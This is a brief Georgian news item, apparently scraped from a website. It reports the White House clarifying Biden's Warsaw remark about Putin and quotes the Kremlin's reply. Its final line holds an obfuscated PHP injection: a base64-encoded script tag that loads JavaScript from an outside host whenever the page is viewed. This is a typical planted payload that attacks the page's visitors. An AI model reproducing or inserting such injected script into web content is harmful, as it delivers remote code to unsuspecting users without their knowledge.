celsiusi
ავერსი შნაიდერი
თეთრი სახლი აშშ-ის პრეზიდენტის ვარშავაში გაკეთებულ განცხადების შესახებ განმარტებას აკეთებს, სადაც აღნიშნულია, რომ ჯო ბაიდენს არ მოუთხოვია რუსეთში რეჟიმის ცვლილება, როდესაც განაცხადა, რომ - “რუსეთის პრეზიდენტი ვლადიმერ პუტინი არ შეიძლება დარჩეს ხელისუფლებაში”.
 
“პრეზიდენტის აზრი ის იყო, რომ პუტინს არ შეიძლება მიეცეს უფლება განახორციელოს ძალაუფლება მეზობლებზე ან რეგიონზე. ის [ბაიდენი] არ განიხილავდა პუტინის ძალაუფლებას რუსეთში ან რეჟიმის შეცვლაზე,”- განაცხადა თეთრი სახლის წარმომადგენელმა.
 
ბაიდენის მიერ პოლონეთში გაკეთებულ განცხადებას უკვე მოჰყვა გამოხმაურება მოსკოვში. კრემლის პრესპიკერის დიმიტრი პესკოვის განცხადებით, ეს საკითხი არა აშშ-ს პრეზიდენტის გადასაწყვეტი, არამედ, რუსეთის ფედერაციის ხალხის არჩევანი უნდა იყოს.
 
 
829
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");